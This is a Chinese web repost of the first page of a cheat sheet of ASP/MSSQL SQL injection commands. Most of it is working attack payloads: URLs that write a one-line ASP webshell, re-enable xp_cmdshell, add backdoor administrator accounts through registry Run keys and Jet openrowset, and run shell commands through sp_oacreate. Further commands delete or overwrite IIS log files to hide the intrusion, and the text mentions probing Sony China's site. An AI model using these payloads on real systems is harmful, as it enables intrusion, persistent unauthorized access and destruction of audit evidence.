主頁(yè) > 知識(shí)庫(kù) > ASP注入詳細(xì)命令40條第1/2頁(yè)

ASP注入詳細(xì)命令40條第1/2頁(yè)

熱門標(biāo)簽:電銷機(jī)器人采購(gòu) 外呼系統(tǒng)怎么話費(fèi) 滴滴地圖標(biāo)注上車點(diǎn) 硅基電話機(jī)器人加盟 友邦互聯(lián)電銷機(jī)器人違法嗎 高質(zhì)量的電銷外呼系統(tǒng) 地圖標(biāo)注還可以做嗎 無(wú)營(yíng)業(yè)執(zhí)照地圖標(biāo)注教學(xué) 宿州防封外呼系統(tǒng)平臺(tái)
1、 用^轉(zhuǎn)義字符來(lái)寫ASP(一句話木馬)文件的方法: 
 http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^script language=VBScript runat=server^>execute request^("l"^)^/script^> >c:\mu.asp';--  

echo ^%execute^(request^("l"^)^)%^> >c:\mu.asp 

2、 顯示SQL系統(tǒng)版本:  
? http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)  
? http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,@@version)-- 

Microsoft VBScript 編譯器錯(cuò)誤 錯(cuò)誤 '800a03f6'  
缺少 'End'  
/iisHelp/common/500-100.asp,行242  
Microsoft OLE DB Provider for ODBC Drivers 錯(cuò)誤 '80040e07'  
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.  
/display.asp,行17 
3、 在檢測(cè)索尼中國(guó)的網(wǎng)站漏洞時(shí),分明已經(jīng)確定了漏洞存在卻無(wú)法在這三種漏洞中找到對(duì)應(yīng)的類型。偶然間我想到了在SQL語(yǔ)言中可以使用"in"關(guān)鍵字進(jìn)行查詢,例如"select * from mytable where id in(1)",括號(hào)中的值就是我們提交的數(shù)據(jù),它的結(jié)果與使用"select * from mytable where id=1"的查詢結(jié)果完全相同。所以訪問(wèn)頁(yè)面的時(shí)候在URL后面加上") and 1=1 and 1 in(1"后原來(lái)的SQL語(yǔ)句就變成了"select * from mytable where id in(1) and 1=1 and 1 in(1)",這樣就會(huì)出現(xiàn)期待已久的頁(yè)面了。暫且就叫這種類型的漏洞為"包含數(shù)字型"吧,聰明的你一定想到了還有"包含字符型"呢。對(duì)了,它就是由于類似"select * from mytable where name in('firstsee')"的查詢語(yǔ)句造成的。 

4、 判斷xp_cmdshell擴(kuò)展存儲(chǔ)過(guò)程是否存在: 
http://192.168.1.5/display.asp?keyno=188 and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell') 
恢復(fù)xp_cmdshell擴(kuò)展存儲(chǔ)的命令: 
http://www.test.com/news/show1.asp?NewsId=125272 
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';-- 

5、 向啟動(dòng)組中寫入命令行和執(zhí)行程序: 
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add' 


6、 查看當(dāng)前的數(shù)據(jù)庫(kù)名稱: 
? http://192.168.1.5/display.asp?keyno=188 and 0>db_name(n) n改成0,1,2,3……就可以跨庫(kù)了 
? http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,db_name())-- 
Microsoft VBScript 編譯器錯(cuò)誤 錯(cuò)誤 '800a03f6'  
缺少 'End'  
/iisHelp/common/500-100.asp,行242  
Microsoft OLE DB Provider for ODBC Drivers 錯(cuò)誤 '80040e07'  
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.  
/display.asp,行17  
7、 列出當(dāng)前所有的數(shù)據(jù)庫(kù)名稱: 
select * from master.dbo.sysdatabases 列出所有列的記錄 
select name from master.dbo.sysdatabases 僅列出name列的記錄 

8、 不需xp_cmdshell支持在有注入漏洞的SQL服務(wù)器上運(yùn)行CMD命令: 
create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL) 
DECLARE @shell INT 
DECLARE @fso INT 
DECLARE @file INT 
DECLARE @isEnd BIT 
DECLARE @out VARCHAR(400) 
EXEC sp_oacreate 'wscript.shell',@shell output 
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\&;c:\temp.txt','0','true' 
--注意run的參數(shù)true指的是將等待程序運(yùn)行的結(jié)果,對(duì)于類似ping的長(zhǎng)時(shí)間命令必需使用此參數(shù)。 

EXEC sp_oacreate 'scripting.filesystemobject',@fso output 
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' 
--因?yàn)閒so的opentextfile方法將返回一個(gè)textstream對(duì)象,所以此時(shí)@file是一個(gè)對(duì)象令牌 

WHILE @shell>0 
BEGIN 
EXEC sp_oamethod @file,'Readline',@out out 
insert INTO MYTMP(info) VALUES (@out) 
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out 
IF @isEnd=1 BREAK 
ELSE CONTINUE 
END 

drop TABLE MYTMP  

---------- 
DECLARE @shell INT 
DECLARE @fso INT 
DECLARE @file INT 
DECLARE @isEnd BIT 
DECLARE @out VARCHAR(400) 
EXEC sp_oacreate 'wscript.shell',@shell output 
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' 
EXEC sp_oacreate 'scripting.filesystemobject',@fso output 
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' 
WHILE @shell>0 
BEGIN 
EXEC sp_oamethod @file,'Readline',@out out 
insert INTO MYTMP(info) VALUES (@out) 
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out 
IF @isEnd=1 BREAK 
ELSE CONTINUE 
END 

以下是一行里面將WEB用戶加到管理員組中: 
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END 

以下是一行中執(zhí)行EXE程序: 
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\&;c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END 

SQL下三種執(zhí)行CMD命令的方法: 

先刪除7.18號(hào)日志: 
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt' 

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END 

(3)首先開(kāi)啟jet沙盤模式,通過(guò)擴(kuò)展存儲(chǔ)過(guò)程xp_regwrite修改注冊(cè)表實(shí)現(xiàn),管理員修改注冊(cè)表不能預(yù)防的原因。出于安全原因,默認(rèn)沙盤模式未開(kāi)啟,這就是為什么需要xp_regwrite的原因,而xp_regwrite至少需要DB_OWNER權(quán)限,為了方便,這里建議使用sysadmin權(quán)限測(cè)試: 
? exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 
注: 
0 禁止一切(默認(rèn)) 
1 使能訪問(wèn)ACCESS,但是禁止其它 
2 禁止訪問(wèn)ACCESS,但是使能其他 
3 使能一切 

? 這里僅給出sysadmin權(quán)限下使用的命令: 
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")') 


? 建立鏈接數(shù)據(jù)庫(kù)'L0op8ack'參考命令: 
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb' 

? 如何使用鏈接數(shù)據(jù)庫(kù): 

使用這個(gè)方式可以執(zhí)行,但是很不幸,DB_OWNER權(quán)限是不夠的,需要至少sysadmin權(quán)限或者securityadmin+setupadmin權(quán)限組合 
sp_addlinkedserver需要sysadmin或setupadmin權(quán)限 
sp_addlinkedsrvlogin需要sysadmin或securityadmin權(quán)限 
最終發(fā)現(xiàn),還是sa權(quán)限或者setupadmin+securityadmin權(quán)限帳戶才能使用, 
一般沒(méi)有哪個(gè)管理員這么設(shè)置普通帳戶權(quán)限的 

實(shí)用性不強(qiáng),僅作為一個(gè)學(xué)習(xí)總結(jié)吧 

大致過(guò)程如下,如果不是sysadmin,那么IAS.mdb權(quán)限驗(yàn)證會(huì)出錯(cuò), 
我測(cè)試的時(shí)候授予hacker這個(gè)用戶setupadmin+securityadmin權(quán)限,使用ias.mdb失敗 
需要找一個(gè)一般用戶可訪問(wèn)的mdb才可以: 

? 新建鏈接服務(wù)器"L0op8ack":EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';-- 
? exec sp_addlinkedsrvlogin 'L0op8ack','false';--或 
exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';-- 
? select * FROM OPENQUERY(L0op8ack, 'select shell("cmd.exe /c net user")');-- 
? exec sp_droplinkedsrvlogin 'L0op8ack','false';-- 
? exec sp_dropserver 'L0op8ack';-- 

再考貝一個(gè)其它文件來(lái)代替7.18日文件: 
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt' 

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END 

(3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline', ut out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END 
12下一頁(yè)閱讀全文
您可能感興趣的文章:
  • Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范
  • 全面了解ASP注入方法 [收集總結(jié)]
  • 全面認(rèn)識(shí)ASP注入技巧
  • 防ASP注入終極防范

標(biāo)簽:儋州 雅安 宣城 江門 七臺(tái)河 新余 廣元 錫林郭勒盟

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《ASP注入詳細(xì)命令40條第1/2頁(yè)》,本文關(guān)鍵詞  ASP,注入,詳細(xì),命令,40條第,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《ASP注入詳細(xì)命令40條第1/2頁(yè)》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于ASP注入詳細(xì)命令40條第1/2頁(yè)的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章